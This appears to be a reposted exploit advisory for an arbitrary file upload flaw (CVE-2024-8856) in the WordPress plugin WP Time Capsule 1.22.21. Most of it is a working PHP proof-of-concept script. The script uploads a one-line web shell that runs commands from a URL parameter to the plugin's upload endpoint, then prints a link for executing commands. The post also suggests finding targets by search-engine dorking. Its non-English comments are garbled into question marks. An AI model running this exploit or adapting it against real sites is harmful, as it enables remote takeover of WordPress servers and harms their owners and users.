=============================================================================================================================================
| # Title : WP Time =============================================================================================================================================
| # Title : WP Time Capsule 1.22.21 PHP Shell Upload vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://fr.wordpress.org/plugins/wp-time-capsule/ |
=============================================================================================================================================
POC :
[+] Dorking ?n Google Or Other Search Enggine.
[+] Code Description: exploits an arbitrary file upload vulnerability in WordPress WP Time Capsule plugin versions less than or equal to 1.22.21.
(Related : https://packetstorm.news/files/id/183146/ Related CVE numbers: CVE-2024-8856 ) .
[+] Payload :
[+] Set Target : line 17
[+] Usage : php poc.php
[+] PayLoad :
<?php
// ??????? ???? ??????? ?? ???????
$target = "http://victim.com/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php";
$payload_name = rand(10,99) . ".php"; // ??? ?????? ?????
$payload_content = "<?php system(\$_GET['cmd']); ?>"; // ????? ????? ?????
// ????? ??? ??? ????? Multipart
$boundary = "----WebKitFormBoundary" . md5(time());
$eol = "\r\n";
$data = "--" . $boundary . $eol;
$data .= 'Content-Disposition: form-data; name="files"; filename="' . $payload_name . '"' . $eol;
$data .= "Content-Type: application/x-php" . $eol . $eol;
$data .= $payload_content . $eol;
$data .= "--" . $boundary . "--" . $eol;
// ????? ?????
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-Type: multipart/form-data; boundary=" . $boundary));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
// ????? ???????
if (strpos($response, $payload_name) !== false) {
echo "[+] ?? ??? ??????? ?????: " . $payload_name . "\n";
echo "[+] ???? ???????: http://victim.com/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/$payload_name?cmd=whoami\n";
} else {
echo "[-] ??? ?? ??? ???????.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
WP Time Capsule 1.22.21 Shell Upload
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 42